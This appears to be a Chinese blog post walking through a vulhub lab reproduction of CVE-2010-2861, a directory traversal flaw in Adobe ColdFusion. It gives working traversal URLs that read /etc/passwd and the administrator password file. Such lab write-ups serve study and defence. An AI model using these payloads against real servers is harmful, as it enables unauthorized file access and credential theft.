CVE-2010-2861(Adobe ColdFusion 文件读取漏洞)

漏洞介绍

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

环境搭建

https://blog.csdn.net/qq_36374896/article/details/84102101
启动漏洞环境:

cd vulhub-master/coldfusion/CVE-2010-2861/
sudo docker-compose up -d
sudo docker ps

在这里插入图片描述

环境启动可能需要1~5分钟,启动后,访问

http://your-ip:8500/CFIDE/administrator/enter.cfm

可以看到初始化页面
在这里插入图片描述
输入密码admin,开始初始化整个环境。
在这里插入图片描述

漏洞复现

直接访问

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

即可读取文件/etc/passwd
在这里插入图片描述
在这里插入图片描述

读取后台管理员密码

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

在这里插入图片描述

posted @ 2018-11-27 09:43  浅笑996  阅读(371)  评论(0编辑  收藏  举报